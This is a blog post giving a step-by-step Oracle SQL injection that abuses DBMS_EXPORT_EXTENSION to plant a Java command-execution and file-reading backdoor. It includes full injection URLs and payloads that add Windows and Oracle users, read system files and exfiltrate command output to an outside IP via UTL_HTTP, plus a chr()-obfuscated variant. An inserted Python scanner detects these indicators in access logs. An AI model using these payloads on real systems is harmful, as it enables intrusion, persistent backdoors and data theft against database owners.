Worked example: the full process of obtaining a cmdshell through Oracle injection

Posted on 2012-12-18 12:21:48
All of the demonstrations below were run in SQL*Plus over the web. For web injection, turn select SYS.DBMS_EXPORT_EXTENSION..... into the form
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
(the " 'a'|| " is there so that the statement evaluates to true). The statement is fairly long, so it may have to be submitted via POST.
The individual steps follow:
1. Create the package
By injecting the SYS.DBMS_EXPORT_EXTENSION function, create a Java package LinxUtil in Oracle with two functions: runCMD, which executes a system command, and readFile, which reads a file:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
------------------------
If the URL has a length limit, the readFile() function block can be dropped, i.e.:
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
At the same time, drop the statements in the later steps that deal with readFile().
------------------------------
2. Grant Java permissions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3. Create the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4. Grant public the privilege to execute the functions
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
5. Test whether the steps above succeeded
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6. Execute commands:
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select  sys.LinxReadFile('c:/boot.ini') from dual
)
Note that sys.LinxReadFile() returns a varchar, so "and 1<>" cannot be used in place of "and '1'<>".
To see the result of the command you can use union:
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
or UTL_HTTP.request:
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
Note: when using UTL_HTTP.request, use REPLACE() to replace spaces and newlines, otherwise the HTTP request cannot be submitted. utl_encode.base64_encode also works.
--------------------
6. Internal changes
The following query shows the changes to the all_objects table:
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
7. Drop the function we created
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
End of article. I dedicate this piece to my friend.
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
Another way to test for the vulnerability:
Create an Oracle account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
That is:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
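The chr()||chr() form above hides the entire third argument (the PL/SQL that the DBMS_EXPORT_EXTENSION call ends up executing), so a log review that only greps for the plaintext keywords misses what the request does. The following Python is an added detection example, not code from the original post: it URL-decodes each web-server request line, resolves chr() chains back into text, and flags the indicators of this technique; the sample log entries are constructed for the example.

```python
import re
import urllib.parse

# Constructed sample access-log entries (not from the original post). Entry 2 is the
# plaintext form of the post's injection; entry 3 is its chr()-encoded form.
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Dec/2012:12:21:48 +0800] "GET /xxx.jsp?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [18/Dec/2012:12:22:03 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E%27a%27%7C%7C'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(%27FOO%27,%27BAR%27,'
    '%27DBMS_OUTPUT%22.PUT(1);EXECUTE%20IMMEDIATE%20...%27,%27SYS%27,0,%271%27,0)%20from%20dual) HTTP/1.1" 500 0',
    '10.0.0.9 - - [18/Dec/2012:12:25:40 +0800] "GET /xxx.jsp?id=1%20and%20%271%27%3C%3E'
    '(select%20SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),'
    'chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)'
    '%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)'
    '%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69),chr(83)%7C%7Cchr(89)'
    '%7C%7Cchr(83),0,chr(49),0)%20from%20dual) HTTP/1.1" 500 0',
]

# Upper-case substrings that, once a request is normalised, mark the technique in the post.
INDICATORS = ("DBMS_EXPORT_EXTENSION", "GET_DOMAIN_INDEX_TABLES", "EXECUTE IMMEDIATE",
              "DBMS_JAVA.GRANT_PERMISSION", "UTL_HTTP.REQUEST")

# Two or more chr(n) calls joined by Oracle's || concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))+", re.IGNORECASE)

def decode_chr_chains(text):
    """Replace each chr(n)||chr(n)... chain with the string it spells."""
    def spell(match):
        codes = re.findall(r"chr\((\d+)\)", match.group(0), re.IGNORECASE)
        # Out-of-range code points (possible in hostile input) become '?' instead of raising.
        return "".join(chr(int(c)) if int(c) < 0x110000 else "?" for c in codes)
    return CHR_CHAIN.sub(spell, text)

def normalize(line):
    """URL-decode twice (double encoding is common), then resolve chr() chains."""
    text = urllib.parse.unquote_plus(urllib.parse.unquote_plus(line))
    return decode_chr_chains(text)

def scan_line(line):
    """Return the indicators present in one log line after normalisation, in INDICATORS order."""
    text = normalize(line).upper()
    return [ind for ind in INDICATORS if ind in text]

def scan_log(lines):
    """Map line index -> matched indicators for every line that hits at least one indicator."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}
```

Run over real access logs, a hit on the third entry is the interesting case: the raw line never contains the words EXECUTE IMMEDIATE, and only the chr() decoding exposes them.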
Confirm the vulnerability exists:
1<>(
select user_id from all_users where username='LINXSQL'
)
Grant linxsql the connect privilege:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
Delete the account:
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
======================
The following method creates a function Linx_query() that can execute multiple statements; if execution succeeds it returns the number "1". Its privileges are inherited, however, and may be nothing more than PUBLIC's, so it seems of limited use; if it is really needed, consider granting dba to the current user:
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)